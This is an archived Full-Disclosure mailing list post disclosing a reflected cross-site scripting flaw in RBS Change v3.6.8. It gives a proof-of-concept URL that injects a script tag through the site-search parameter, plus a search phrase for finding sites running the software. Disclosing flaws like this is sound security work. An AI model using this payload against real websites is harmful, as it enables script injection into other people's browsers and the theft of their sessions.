[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] RBS Change v3.6.8 XSS Vulnerability

To: submissions@xxxxxxxxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, exploit@xxxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] RBS Change v3.6.8 XSS Vulnerability
From: "metropolis haxor" <metrOpolis@xxxxxxxxxxxxx>
Date: Wed, 25 Dec 2013 10:08:52 -0500

Hi guys,

You can find the software affected at 
http://www.rbschange.fr/addons/distributions/RBS-Change-Core,51422.html

Thanks,

Metropolis

###########################################
#
# Script Name : RBS Change
#
# Version : v3.6.8
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 25/12/2013
#
# Download app : 
http://www.rbschange.fr/addons/distributions/RBS-Change-Core,51422.html
#
# Google search :  Propulsé par RBS Change
#
###########################################
 
PoC :
 
http://[target]/[path]/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=[XSS]
 
Example :
 
http://[target]/[path]/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=1";><script>alert(31337);</script>
 
local Example :
 
http://localhost/demo/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=1";><script>alert(31337);</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [ MDVSA-2013:302 ] pixman
Next by Date: [Full-disclosure] [Wooyun]Amazon elasticbeanstalk code execution
Previous by thread: [Full-disclosure] [ MDVSA-2013:302 ] pixman
Next by thread: [Full-disclosure] [Wooyun]Amazon elasticbeanstalk code execution
Index(es):
- Date
- Thread